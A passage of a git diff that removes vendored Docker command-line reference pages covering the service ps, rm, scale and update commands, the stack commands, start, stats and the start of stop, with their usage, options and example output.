-When deploying a service, docker resolves the digest for the service's
-image, and pins the service to that digest. The digest is not shown by
-default, but is printed if `--no-trunc` is used. The `--no-trunc` option
-also shows the non-truncated task ID, and error-messages, as can be seen below;
-
-```bash
-$ docker service ps --no-trunc redis
-
-ID                          NAME         IMAGE                                                                                NODE      DESIRED STATE  CURRENT STATE            ERROR                                                                                           PORTS
-50qe8lfnxaxksi9w2a704wkp7   redis.1      redis:3.0.6@sha256:6a692a76c2081888b589e26e6ec835743119fe453d67ecf03df7de5b73d69842  manager1  Running        Running 5 minutes ago
-ky2re9oz86r9556i2szb8a8af   \_ redis.1   redis:3.0.5@sha256:f8829e00d95672c48c60f468329d6693c4bdd28d1f057e755f8ba8b40008682e  worker2   Shutdown       Shutdown 5 minutes ago
-bk658fpbex0d57cqcwoe3jthu   redis.2      redis:3.0.6@sha256:6a692a76c2081888b589e26e6ec835743119fe453d67ecf03df7de5b73d69842  worker2   Running        Running 5 seconds
-nvjljf7rmor4htv7l8rwcx7i7   \_ redis.2   redis:3.0.6@sha256:6a692a76c2081888b589e26e6ec835743119fe453d67ecf03df7de5b73d69842  worker2   Shutdown       Rejected 5 minutes ago   "No such image: redis@sha256:6a692a76c2081888b589e26e6ec835743119fe453d67ecf03df7de5b73d69842"
-```
-
-## Filtering
-
-The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there
-is more than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`).
-Multiple filter flags are combined as an `OR` filter. For example,
-`-f name=redis.1 -f name=redis.7` returns both `redis.1` and `redis.7` tasks.
-
-The currently supported filters are:
-
-* [id](#id)
-* [name](#name)
-* [node](#node)
-* [desired-state](#desired-state)
-
-
-#### ID
-
-The `id` filter matches on all or a prefix of a task's ID.
-
-```bash
-$ docker service ps -f "id=8" redis
-
-ID             NAME      IMAGE        NODE      DESIRED STATE  CURRENT STATE      ERROR  PORTS
-8ryt076polmc   redis.4   redis:3.0.6  worker1   Running        Running 9 seconds
-8eaxrb2fqpbn   redis.10  redis:3.0.6  manager1  Running        Running 8 seconds
-```
-
-#### Name
-
-The `name` filter matches on task names.
-
-```bash
-$ docker service ps -f "name=redis.1" redis
-ID            NAME     IMAGE        NODE      DESIRED STATE  CURRENT STATE      ERROR  PORTS
-qihejybwf1x5  redis.1  redis:3.0.6  manager1  Running        Running 8 seconds
-```
-
-
-#### Node
-
-The `node` filter matches on a node name or a node ID.
-
-```bash
-$ docker service ps -f "node=manager1" redis
-ID            NAME      IMAGE        NODE      DESIRED STATE  CURRENT STATE      ERROR  PORTS
-0qihejybwf1x  redis.1   redis:3.0.6  manager1  Running        Running 8 seconds
-1x0v8yomsncd  redis.5   redis:3.0.6  manager1  Running        Running 8 seconds
-3w1wu13yupln  redis.9   redis:3.0.6  manager1  Running        Running 8 seconds
-8eaxrb2fqpbn  redis.10  redis:3.0.6  manager1  Running        Running 8 seconds
-```
-
-
-#### desired-state
-
-The `desired-state` filter can take the values `running`, `shutdown`, and `accepted`.
-
-
-## Related information
-
-* [service create](service_create.md)
-* [service inspect](service_inspect.md)
-* [service logs](service_logs.md)
-* [service ls](service_ls.md)
-* [service rm](service_rm.md)
-* [service scale](service_scale.md)
-* [service update](service_update.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_rm.md
deleted file mode 100644
index d0ba90b26d..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/service_rm.md
+++ /dev/null
@@ -1,55 +0,0 @@
----
-title: "service rm"
-description: "The service rm command description and usage"
-keywords: "service, rm"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# service rm
-
-```Markdown
-Usage:	docker service rm SERVICE [SERVICE...]
-
-Remove one or more services
-
-Aliases:
-  rm, remove
-
-Options:
-      --help   Print usage
-```
-
-Removes the specified services from the swarm. This command has to be run
-targeting a manager node.
-
-For example, to remove the redis service:
-
-```bash
-$ docker service rm redis
-redis
-$ docker service ls
-ID  NAME  MODE  REPLICAS  IMAGE
-```
-
-> **Warning**: Unlike `docker rm`, this command does not ask for confirmation
-> before removing a running service.
-
-
-
-## Related information
-
-* [service create](service_create.md)
-* [service inspect](service_inspect.md)
-* [service logs](service_logs.md)
-* [service ls](service_ls.md)
-* [service scale](service_scale.md)
-* [service ps](service_ps.md)
-* [service update](service_update.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_scale.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_scale.md
deleted file mode 100644
index 64075ed092..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/service_scale.md
+++ /dev/null
@@ -1,96 +0,0 @@
----
-title: "service scale"
-description: "The service scale command description and usage"
-keywords: "service, scale"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# service scale
-
-```markdown
-Usage:  docker service scale SERVICE=REPLICAS [SERVICE=REPLICAS...]
-
-Scale one or multiple replicated services
-
-Options:
-      --help   Print usage
-```
-
-## Examples
-
-### Scale a service
-
-The scale command enables you to scale one or more replicated services either up
-or down to the desired number of replicas. This command cannot be applied on
-services which are global mode. The command will return immediately, but the
-actual scaling of the service may take some time. To stop all replicas of a
-service while keeping the service active in the swarm you can set the scale to 0.
-
-For example, the following command scales the "frontend" service to 50 tasks.
-
-```bash
-$ docker service scale frontend=50
-frontend scaled to 50
-```
-
-The following command tries to scale a global service to 10 tasks and returns an error.
-
-```
-$ docker service create --mode global --name backend backend:latest
-b4g08uwuairexjub6ome6usqh
-$ docker service scale backend=10
-backend: scale can only be used with replicated mode
-```
-
-Directly afterwards, run `docker service ls`, to see the actual number of
-replicas.
-
-```bash
-$ docker service ls --filter name=frontend
-
-ID            NAME      MODE        REPLICAS  IMAGE
-3pr5mlvu3fh9  frontend  replicated  15/50     nginx:alpine
-```
-
-You can also scale a service using the [`docker service update`](service_update.md)
-command. The following commands are equivalent:
-
-```bash
-$ docker service scale frontend=50
-$ docker service update --replicas=50 frontend
-```
-
-### Scale multiple services
-
-The `docker service scale` command allows you to set the desired number of
-tasks for multiple services at once. The following example scales both the
-backend and frontend services:
-
-```bash
-$ docker service scale backend=3 frontend=5
-backend scaled to 3
-frontend scaled to 5
-
-$ docker service ls
-ID            NAME      MODE        REPLICAS  IMAGE
-3pr5mlvu3fh9  frontend  replicated  5/5       nginx:alpine
-74nzcxxjv6fq  backend   replicated  3/3       redis:3.0.6
-```
-
-## Related information
-
-* [service create](service_create.md)
-* [service inspect](service_inspect.md)
-* [service logs](service_logs.md)
-* [service ls](service_ls.md)
-* [service rm](service_rm.md)
-* [service ps](service_ps.md)
-* [service update](service_update.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_update.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_update.md
deleted file mode 100644
index 301a0eabe8..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/service_update.md
+++ /dev/null
@@ -1,181 +0,0 @@
----
-title: "service update"
-description: "The service update command description and usage"
-keywords: "service, update"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# service update
-
-```Markdown
-Usage:  docker service update [OPTIONS] SERVICE
-
-Update a service
-
-Options:
-      --args string                      Service command args
-      --constraint-add list              Add or update a placement constraint (default [])
-      --constraint-rm list               Remove a constraint (default [])
-      --container-label-add list         Add or update a container label (default [])
-      --container-label-rm list          Remove a container label by its key (default [])
-      --dns-add list                     Add or update a custom DNS server (default [])
-      --dns-option-add list              Add or update a DNS option (default [])
-      --dns-option-rm list               Remove a DNS option (default [])
-      --dns-rm list                      Remove a custom DNS server (default [])
-      --dns-search-add list              Add or update a custom DNS search domain (default [])
-      --dns-search-rm list               Remove a DNS search domain (default [])
-      --endpoint-mode string             Endpoint mode (vip or dnsrr)
-      --env-add list                     Add or update an environment variable (default [])
-      --env-rm list                      Remove an environment variable (default [])
-      --force                            Force update even if no changes require it
-      --group-add list                   Add an additional supplementary user group to the container (default [])
-      --group-rm list                    Remove a previously added supplementary user group from the container (default [])
-      --health-cmd string                Command to run to check health
-      --health-interval duration         Time between running the check (ns|us|ms|s|m|h)
-      --health-retries int               Consecutive failures needed to report unhealthy
-      --health-timeout duration          Maximum time to allow one check to run (ns|us|ms|s|m|h)
-      --help                             Print usage
-      --host-add list                    Add or update a custom host-to-IP mapping (host:ip) (default [])
-      --host-rm list                     Remove a custom host-to-IP mapping (host:ip) (default [])
-      --hostname string                  Container hostname
-      --image string                     Service image tag
-      --label-add list                   Add or update a service label (default [])
-      --label-rm list                    Remove a label by its key (default [])
-      --limit-cpu decimal                Limit CPUs (default 0.000)
-      --limit-memory bytes               Limit Memory (default 0 B)
-      --log-driver string                Logging driver for service
-      --log-opt list                     Logging driver options (default [])
-      --mount-add mount                  Add or update a mount on a service
-      --mount-rm list                    Remove a mount by its target path (default [])
-      --no-healthcheck                   Disable any container-specified HEALTHCHECK
-      --publish-add port                 Add or update a published port
-      --publish-rm port                  Remove a published port by its target port
-      --replicas uint                    Number of tasks
-      --reserve-cpu decimal              Reserve CPUs (default 0.000)
-      --reserve-memory bytes             Reserve Memory (default 0 B)
-      --restart-condition string         Restart when condition is met (none, on-failure, or any)
-      --restart-delay duration           Delay between restart attempts (ns|us|ms|s|m|h)
-      --restart-max-attempts uint        Maximum number of restarts before giving up
-      --restart-window duration          Window used to evaluate the restart policy (ns|us|ms|s|m|h)
-      --rollback                         Rollback to previous specification
-      --secret-add secret                Add or update a secret on a service
-      --secret-rm list                   Remove a secret (default [])
-      --stop-grace-period duration       Time to wait before force killing a container (ns|us|ms|s|m|h)
-  -t, --tty                              Allocate a pseudo-TTY
-      --update-delay duration            Delay between updates (ns|us|ms|s|m|h) (default 0s)
-      --update-failure-action string     Action on update failure (pause|continue) (default "pause")
-      --update-max-failure-ratio float   Failure rate to tolerate during an update
-      --update-monitor duration          Duration after each task update to monitor for failure (ns|us|ms|s|m|h) (default 0s)
-      --update-parallelism uint          Maximum number of tasks updated simultaneously (0 to update all at once) (default 1)
-  -u, --user string                      Username or UID (format: <name|uid>[:<group|gid>])
-      --with-registry-auth               Send registry authentication details to swarm agents
-  -w, --workdir string                   Working directory inside the container
-```
-
-Updates a service as described by the specified parameters. This command has to be run targeting a manager node.
-The parameters are the same as [`docker service create`](service_create.md). Please look at the description there
-for further information.
-
-Normally, updating a service will only cause the service's tasks to be replaced with new ones if a change to the
-service requires recreating the tasks for it to take effect. For example, only changing the
-`--update-parallelism` setting will not recreate the tasks, because the individual tasks are not affected by this
-setting. However, the `--force` flag will cause the tasks to be recreated anyway. This can be used to perform a
-rolling restart without any changes to the service parameters.
-
-## Examples
-
-### Update a service
-
-```bash
-$ docker service update --limit-cpu 2 redis
-```
-
-### Perform a rolling restart with no parameter changes
-
-```bash
-$ docker service update --force --update-parallelism 1 --update-delay 30s redis
-```
-
-In this example, the `--force` flag causes the service's tasks to be shut down
-and replaced with new ones even though none of the other parameters would
-normally cause that to happen. The `--update-parallelism 1` setting ensures
-that only one task is replaced at a time (this is the default behavior). The
-`--update-delay 30s` setting introduces a 30 second delay between tasks, so
-that the rolling restart happens gradually.
-
-### Adding and removing mounts
-
-Use the `--mount-add` or `--mount-rm` options add or remove a service's bind-mounts
-or volumes.
-
-The following example creates a service which mounts the `test-data` volume to
-`/somewhere`. The next step updates the service to also mount the `other-volume`
-volume to `/somewhere-else`volume, The last step unmounts the `/somewhere` mount
-point, effectively removing the `test-data` volume. Each command returns the
-service name.
-
-- The `--mount-add` flag takes the same parameters as the `--mount` flag on
-  `service create`. Refer to the [volumes and
-  bind-mounts](service_create.md#volumes-and-bind-mounts-mount) section in the
-  `service create` reference for details.
-
-- The `--mount-rm` flag takes the `target` path of the mount.
-
-```bash
-$ docker service create \
-    --name=myservice \
-    --mount \
-      type=volume,source=test-data,target=/somewhere \
-    nginx:alpine \
-    myservice
-
-myservice
-
-$ docker service update \
-    --mount-add \
-      type=volume,source=other-volume,target=/somewhere-else \
-    myservice
-
-myservice
-
-$ docker service update --mount-rm /somewhere myservice
-
-myservice
-```
-
-### Adding and removing secrets
-
-Use the `--secret-add` or `--secret-rm` options add or remove a service's
-secrets.
-
-The following example adds a secret named `ssh-2` and removes `ssh-1`:
-
-```bash
-$ docker service update \
-    --secret-add source=ssh-2,target=ssh-2 \
-    --secret-rm ssh-1 \
-    myservice
-```
-
-### Update services using templates
-
-Some flags of `service update` support the use of templating.
-See [`service create`](./service_create.md#templating) for the reference.
-
-## Related information
-
-* [service create](service_create.md)
-* [service inspect](service_inspect.md)
-* [service logs](service_logs.md)
-* [service ls](service_ls.md)
-* [service ps](service_ps.md)
-* [service rm](service_rm.md)
-* [service scale](service_scale.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stack_deploy.md b/vendor/github.com/docker/docker/docs/reference/commandline/stack_deploy.md
deleted file mode 100644
index 037feaebd7..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/stack_deploy.md
+++ /dev/null
@@ -1,98 +0,0 @@
----
-title: "stack deploy"
-description: "The stack deploy command description and usage"
-keywords: "stack, deploy, up"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# stack deploy
-
-```markdown
-Usage:  docker stack deploy [OPTIONS] STACK
-
-Deploy a new stack or update an existing stack
-
-Aliases:
-  deploy, up
-
-Options:
-      --bundle-file string    Path to a Distributed Application Bundle file
-  -c, --compose-file string   Path to a Compose file
-      --help                  Print usage
-      --with-registry-auth    Send registry authentication details to Swarm agents
-```
-
-Create and update a stack from a `compose` or a `dab` file on the swarm. This command
-has to be run targeting a manager node.
-
-## Compose file
-
-The `deploy` command supports compose file version `3.0` and above."
-
-```bash
-$ docker stack deploy --compose-file docker-compose.yml vossibility
-Ignoring unsupported options: links
-
-Creating network vossibility_vossibility
-Creating network vossibility_default
-Creating service vossibility_nsqd
-Creating service vossibility_logstash
-Creating service vossibility_elasticsearch
-Creating service vossibility_kibana
-Creating service vossibility_ghollector
-Creating service vossibility_lookupd
-```
-
-You can verify that the services were correctly created
-
-```
-$ docker service ls
-ID            NAME                               MODE        REPLICAS  IMAGE
-29bv0vnlm903  vossibility_lookupd                replicated  1/1       nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662
-4awt47624qwh  vossibility_nsqd                   replicated  1/1       nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662
-4tjx9biia6fs  vossibility_elasticsearch          replicated  1/1       elasticsearch@sha256:12ac7c6af55d001f71800b83ba91a04f716e58d82e748fa6e5a7359eed2301aa
-7563uuzr9eys  vossibility_kibana                 replicated  1/1       kibana@sha256:6995a2d25709a62694a937b8a529ff36da92ebee74bafd7bf00e6caf6db2eb03
-9gc5m4met4he  vossibility_logstash               replicated  1/1       logstash@sha256:2dc8bddd1bb4a5a34e8ebaf73749f6413c101b2edef6617f2f7713926d2141fe
-axqh55ipl40h  vossibility_vossibility-collector  replicated  1/1       icecrime/vossibility-collector@sha256:f03f2977203ba6253988c18d04061c5ec7aab46bca9dfd89a9a1fa4500989fba
-```
-
-## DAB file
-
-```bash
-$ docker stack deploy --bundle-file vossibility-stack.dab vossibility
-Loading bundle from vossibility-stack.dab
-Creating service vossibility_elasticsearch
-Creating service vossibility_kibana
-Creating service vossibility_logstash
-Creating service vossibility_lookupd
-Creating service vossibility_nsqd
-Creating service vossibility_vossibility-collector
-```
-
-You can verify that the services were correctly created:
-
-```bash
-$ docker service ls
-ID            NAME                               MODE        REPLICAS  IMAGE
-29bv0vnlm903  vossibility_lookupd                replicated  1/1       nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662
-4awt47624qwh  vossibility_nsqd                   replicated  1/1       nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662
-4tjx9biia6fs  vossibility_elasticsearch          replicated  1/1       elasticsearch@sha256:12ac7c6af55d001f71800b83ba91a04f716e58d82e748fa6e5a7359eed2301aa
-7563uuzr9eys  vossibility_kibana                 replicated  1/1       kibana@sha256:6995a2d25709a62694a937b8a529ff36da92ebee74bafd7bf00e6caf6db2eb03
-9gc5m4met4he  vossibility_logstash               replicated  1/1       logstash@sha256:2dc8bddd1bb4a5a34e8ebaf73749f6413c101b2edef6617f2f7713926d2141fe
-axqh55ipl40h  vossibility_vossibility-collector  replicated  1/1       icecrime/vossibility-collector@sha256:f03f2977203ba6253988c18d04061c5ec7aab46bca9dfd89a9a1fa4500989fba
-```
-
-## Related information
-
-* [stack ls](stack_ls.md)
-* [stack ps](stack_ps.md)
-* [stack rm](stack_rm.md)
-* [stack services](stack_services.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stack_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/stack_ls.md
deleted file mode 100644
index 05c7215492..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/stack_ls.md
+++ /dev/null
@@ -1,47 +0,0 @@
----
-title: "stack ls"
-description: "The stack ls command description and usage"
-keywords: "stack, ls"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# stack ls
-
-```markdown
-Usage:	docker stack ls
-
-List stacks
-
-Aliases:
-  ls, list
-
-Options:
-      --help   Print usage
-```
-
-Lists the stacks.
-
-For example, the following command shows all stacks and some additional information:
-
-```bash
-$ docker stack ls
-
-ID                 SERVICES
-vossibility-stack  6
-myapp              2
-```
-
-## Related information
-
-* [stack deploy](stack_deploy.md)
-* [stack ps](stack_ps.md)
-* [stack rm](stack_rm.md)
-* [stack services](stack_services.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stack_ps.md b/vendor/github.com/docker/docker/docs/reference/commandline/stack_ps.md
deleted file mode 100644
index 101e9feb11..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/stack_ps.md
+++ /dev/null
@@ -1,51 +0,0 @@
----
-title: "stack ps"
-description: "The stack ps command description and usage"
-keywords: "stack, ps"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# stack ps
-
-```markdown
-Usage:  docker stack ps [OPTIONS] STACK
-
-List the tasks in the stack
-
-Options:
-  -f, --filter filter   Filter output based on conditions provided
-      --help            Print usage
-      --no-resolve      Do not map IDs to Names
-      --no-trunc        Do not truncate output
-```
-
-Lists the tasks that are running as part of the specified stack. This
-command has to be run targeting a manager node.
-
-## Filtering
-
-The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there
-is more than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`).
-Multiple filter flags are combined as an `OR` filter. For example,
-`-f name=redis.1 -f name=redis.7` returns both `redis.1` and `redis.7` tasks.
-
-The currently supported filters are:
-
-* id
-* name
-* desired-state
-
-## Related information
-
-* [stack deploy](stack_deploy.md)
-* [stack ls](stack_ls.md)
-* [stack rm](stack_rm.md)
-* [stack services](stack_services.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stack_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/stack_rm.md
deleted file mode 100644
index fd639978ec..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/stack_rm.md
+++ /dev/null
@@ -1,38 +0,0 @@
----
-title: "stack rm"
-description: "The stack rm command description and usage"
-keywords: "stack, rm, remove, down"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# stack rm
-
-```markdown
-Usage:  docker stack rm STACK
-
-Remove the stack
-
-Aliases:
-  rm, remove, down
-
-Options:
-      --help   Print usage
-```
-
-Remove the stack from the swarm. This command has to be run targeting
-a manager node.
-
-## Related information
-
-* [stack deploy](stack_deploy.md)
-* [stack ls](stack_ls.md)
-* [stack ps](stack_ps.md)
-* [stack services](stack_services.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stack_services.md b/vendor/github.com/docker/docker/docs/reference/commandline/stack_services.md
deleted file mode 100644
index 62779b4aa1..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/stack_services.md
+++ /dev/null
@@ -1,70 +0,0 @@
----
-title: "stack services"
-description: "The stack services command description and usage"
-keywords: "stack, services"
-advisory: "experimental"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# stack services (experimental)
-
-```markdown
-Usage:	docker stack services [OPTIONS] STACK
-
-List the services in the stack
-
-Options:
-  -f, --filter value   Filter output based on conditions provided
-      --help           Print usage
-  -q, --quiet          Only display IDs
-```
-
-Lists the services that are running as part of the specified stack. This
-command has to be run targeting a manager node.
-
-For example, the following command shows all services in the `myapp` stack:
-
-```bash
-$ docker stack services myapp
-
-ID            NAME            REPLICAS  IMAGE                                                                          COMMAND
-7be5ei6sqeye  myapp_web       1/1       nginx@sha256:23f809e7fd5952e7d5be065b4d3643fbbceccd349d537b62a123ef2201bc886f
-dn7m7nhhfb9y  myapp_db        1/1       mysql@sha256:a9a5b559f8821fe73d58c3606c812d1c044868d42c63817fa5125fd9d8b7b539
-```
-
-## Filtering
-
-The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there
-is more than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`).
-Multiple filter flags are combined as an `OR` filter.
-
-The following command shows both the `web` and `db` services:
-
-```bash
-$ docker stack services --filter name=myapp_web --filter name=myapp_db myapp
-
-ID            NAME            REPLICAS  IMAGE                                                                          COMMAND
-7be5ei6sqeye  myapp_web       1/1       nginx@sha256:23f809e7fd5952e7d5be065b4d3643fbbceccd349d537b62a123ef2201bc886f
-dn7m7nhhfb9y  myapp_db        1/1       mysql@sha256:a9a5b559f8821fe73d58c3606c812d1c044868d42c63817fa5125fd9d8b7b539
-```
-
-The currently supported filters are:
-
-* id / ID (`--filter id=7be5ei6sqeye`, or `--filter ID=7be5ei6sqeye`)
-* name (`--filter name=myapp_web`)
-* label (`--filter label=key=value`)
-
-## Related information
-
-* [stack deploy](stack_deploy.md)
-* [stack ls](stack_ls.md)
-* [stack ps](stack_ps.md)
-* [stack rm](stack_rm.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/start.md b/vendor/github.com/docker/docker/docs/reference/commandline/start.md
deleted file mode 100644
index 980bce9585..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/start.md
+++ /dev/null
@@ -1,28 +0,0 @@
----
-title: "start"
-description: "The start command description and usage"
-keywords: "Start, container, stopped"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# start
-
-```markdown
-Usage:  docker start [OPTIONS] CONTAINER [CONTAINER...]
-
-Start one or more stopped containers
-
-Options:
-  -a, --attach               Attach STDOUT/STDERR and forward signals
-      --detach-keys string   Override the key sequence for detaching a container
-      --help                 Print usage
-  -i, --interactive          Attach container's STDIN
-```
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stats.md b/vendor/github.com/docker/docker/docs/reference/commandline/stats.md
deleted file mode 100644
index f5d0d54f35..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/stats.md
+++ /dev/null
@@ -1,117 +0,0 @@
----
-title: "stats"
-description: "The stats command description and usage"
-keywords: "container, resource, statistics"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# stats
-
-```markdown
-Usage:  docker stats [OPTIONS] [CONTAINER...]
-
-Display a live stream of container(s) resource usage statistics
-
-Options:
-  -a, --all             Show all containers (default shows just running)
-      --format string   Pretty-print images using a Go template
-      --help            Print usage
-      --no-stream       Disable streaming stats and only pull the first result
-```
-
-The `docker stats` command returns a live data stream for running containers. To limit data to one or more specific containers, specify a list of container names or ids separated by a space. You can specify a stopped container but stopped containers do not return any data.
-
-If you want more detailed information about a container's resource usage, use the `/containers/(id)/stats` API endpoint.
-
-## Examples
-
-Running `docker stats` on all running containers against a Linux daemon.
-
-    $ docker stats
-    CONTAINER           CPU %               MEM USAGE / LIMIT     MEM %               NET I/O             BLOCK I/O
-    1285939c1fd3        0.07%               796 KiB / 64 MiB        1.21%               788 B / 648 B       3.568 MB / 512 KB
-    9c76f7834ae2        0.07%               2.746 MiB / 64 MiB      4.29%               1.266 KB / 648 B    12.4 MB / 0 B
-    d1ea048f04e4        0.03%               4.583 MiB / 64 MiB      6.30%               2.854 KB / 648 B    27.7 MB / 0 B
-
-Running `docker stats` on multiple containers by name and id against a Linux daemon.
-
-    $ docker stats fervent_panini 5acfcb1b4fd1
-    CONTAINER           CPU %               MEM USAGE/LIMIT       MEM %               NET I/O
-    5acfcb1b4fd1        0.00%               115.2 MiB/1.045 GiB   11.03%              1.422 kB/648 B
-    fervent_panini      0.02%               11.08 MiB/1.045 GiB   1.06%               648 B/648 B
-
-Running `docker stats` on all running containers against a Windows daemon.
-
-    PS E:\> docker stats
-    CONTAINER           CPU %               PRIV WORKING SET    NET I/O             BLOCK I/O
-    09d3bb5b1604        6.61%               38.21 MiB           17.1 kB / 7.73 kB   10.7 MB / 3.57 MB
-    9db7aa4d986d        9.19%               38.26 MiB           15.2 kB / 7.65 kB   10.6 MB / 3.3 MB
-    3f214c61ad1d        0.00%               28.64 MiB           64 kB / 6.84 kB     4.42 MB / 6.93 MB
-
-Running `docker stats` on multiple containers by name and id against a Windows daemon.
-
-    PS E:\> docker ps -a
-    CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES
-    3f214c61ad1d        nanoserver          "cmd"               2 minutes ago       Up 2 minutes                            big_minsky
-    9db7aa4d986d        windowsservercore   "cmd"               2 minutes ago       Up 2 minutes                            mad_wilson
-    09d3bb5b1604        windowsservercore   "cmd"               2 minutes ago       Up 2 minutes                            affectionate_easley
-
-    PS E:\> docker stats 3f214c61ad1d mad_wilson
-    CONTAINER           CPU %               PRIV WORKING SET    NET I/O             BLOCK I/O
-    3f214c61ad1d        0.00%               46.25 MiB           76.3 kB / 7.92 kB   10.3 MB / 14.7 MB
-    mad_wilson          9.59%               40.09 MiB           27.6 kB / 8.81 kB   17 MB / 20.1 MB
-
-## Formatting
-
-The formatting option (`--format`) pretty prints container output
-using a Go template.
-
-Valid placeholders for the Go template are listed below:
-
-Placeholder  | Description
------------- | --------------------------------------------
-`.Container` | Container name or ID (user input)
-`.Name`      | Container name
-`.ID`        | Container ID
-`.CPUPerc`   | CPU percentage
-`.MemUsage`  | Memory usage
-`.NetIO`     | Network IO
-`.BlockIO`   | Block IO
-`.MemPerc`   | Memory percentage (Not available on Windows)
-`.PIDs`      | Number of PIDs (Not available on Windows)
-
-
-When using the `--format` option, the `stats` command either
-outputs the data exactly as the template declares or, when using the
-`table` directive, includes column headers as well.
-
-The following example uses a template without headers and outputs the
-`Container` and `CPUPerc` entries separated by a colon for all images:
-
-```bash
-$ docker stats --format "{{.Container}}: {{.CPUPerc}}"
-
-09d3bb5b1604: 6.61%
-9db7aa4d986d: 9.19%
-3f214c61ad1d: 0.00%
-```
-
-To list all containers statistics with their name, CPU percentage and memory
-usage in a table format you can use:
-
-```bash
-$ docker stats --format "table {{.Container}}\t{{.CPUPerc}}\t{{.MemUsage}}"
-
-CONTAINER           CPU %               PRIV WORKING SET
-1285939c1fd3        0.07%               796 KiB / 64 MiB
-9c76f7834ae2        0.07%               2.746 MiB / 64 MiB
-d1ea048f04e4        0.03%               4.583 MiB / 64 MiB
-```
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stop.md b/vendor/github.com/docker/docker/docs/reference/commandline/stop.md
deleted file mode 100644
index 3090db98ae..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/stop.md
+++ /dev/null
@@ -1,29 +0,0 @@
----
-title: "stop"
-description: "The stop command description and usage"
-keywords: "stop, SIGKILL, SIGTERM"
----
-
-<!-- This file is maintained within the docker/docker Github
